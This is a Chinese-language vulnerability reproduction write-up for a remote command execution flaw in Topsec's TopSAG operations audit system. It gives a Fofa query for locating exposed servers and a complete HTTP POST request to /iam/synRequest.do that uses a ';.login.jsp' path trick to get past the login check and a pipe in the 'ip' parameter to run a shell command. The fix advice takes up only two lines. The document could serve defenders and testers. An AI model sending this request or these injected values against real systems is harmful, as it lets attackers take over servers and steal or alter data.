天融信运维安全审计系统 synRequest 远程命令执行漏洞复现

0x01 产品描述：

        天融信运维安全审计系统TopSAG是基于自主知识产权NGTOS安全操作系统平台和多年网络安全防护经验积累研发而成，系统以4A管理理念为基础、安全代理为核心，在运维管理领域持续创新，为客户提供事前预防、事中监控、事后审计的全方位运维安全解决方案，适用于政府、金融、能源、电信、交通、教育等行业。

0x02 漏洞描述：

        天融信 运维安全审计系统 synRequest.do 存在命令执行漏洞，攻击者可以通过这个漏洞在服务器上执行任意命令，完全控制权，进行非法操作、窃取和篡改敏感数据，甚至完全接管服务器，给系统的安全性带来严重威胁。

0x03 搜索语句：

Fofa:header="iam" && server="Apache-Coyote/"

0x04 漏洞复现：

POST /iam/synRequest.do;.login.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Content-Length: 67

method=trace_route&w=1&ip=127.0.0.1|echo%20`dir`%3b&m=10

 

0x05 修复建议：

用防火墙等安全设备设定访问规则，只允许白名单中的设备访问

及时升级产品到最新版本。